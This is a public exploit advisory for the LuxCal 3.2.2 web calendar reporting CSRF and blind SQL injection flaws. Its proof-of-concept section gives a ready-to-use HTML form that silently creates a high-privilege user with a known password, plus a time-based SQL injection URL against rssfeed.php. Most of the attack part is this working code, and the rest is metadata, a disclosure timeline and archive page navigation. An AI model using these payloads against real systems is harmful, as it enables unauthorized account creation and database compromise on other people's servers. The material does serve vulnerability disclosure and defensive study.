the original cloud security

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection
Posted Mar 10, 2014
Authored by TUNISIAN CYBER

LuxCal version 3.2.2 suffers from cross site request forgery and remote blind SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
MD5 | 01f1051b8e319d3a5fe4e229c91f4bb9

LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection

Change Mirror Download
[+] Author: TUNISIAN CYBER
[+] Exploit Title: LuxCal v3.2.2 CSRF/Blind SQL Injection Vulnerabilities
[+] Date: 09-03-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352/CWE-89
[+] Vendor: http://www.luxsoft.eu/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R

1.OVERVIEW:
LuxCal v3.2.2 suffers from a CSRF and Blind SQL Injection Vulnerabilities.

2.Version:
3.2.2

3.Background:
LuxCal is an innovative web based event calendar for home use and small businesses.
It is easy to setup and allows easy and fast management of your calendar events at home,
in the office, on business trips or when on holiday. LuxCal is feature rich, has been
designed for user-friendliness and will help you to make error-free data inputs.
The user interface colors are easy to customize. LuxCal is free "open source" software
released under the GNU General Public License
http://www.luxsoft.eu/index.php?pge=dtail

4.Proof Of Concept:
CSRF:
<html>
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">
<input type="hidden" name="uname" value="tcyber"/>
<input type="hidden" name="email" value="g4k@hot.mail"/>
<input type="hidden" name="new_pw" value="123456"/>
<input type="hidden" name="userRights" value="9"/>
<input type='submit' name='addExe' value="Add Profile">
</form>
</html>

Blind SQL Ijnection:
http://127.0.0.1/lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%27%2b(select(0)from(select(sleep(0)))v)%2b%27%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
"SQL error. See 'logs/mysql.log'"

5.Solution(s):
no contact from vendor

6.TIME-LINE:
2014-07-03: Vulnerability was discovered.
2014-07-03: Contact with vendor.
2014-08-03: No reply.
2014-09-03: No reply.
2014-09-03: Vulnerability Published



7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close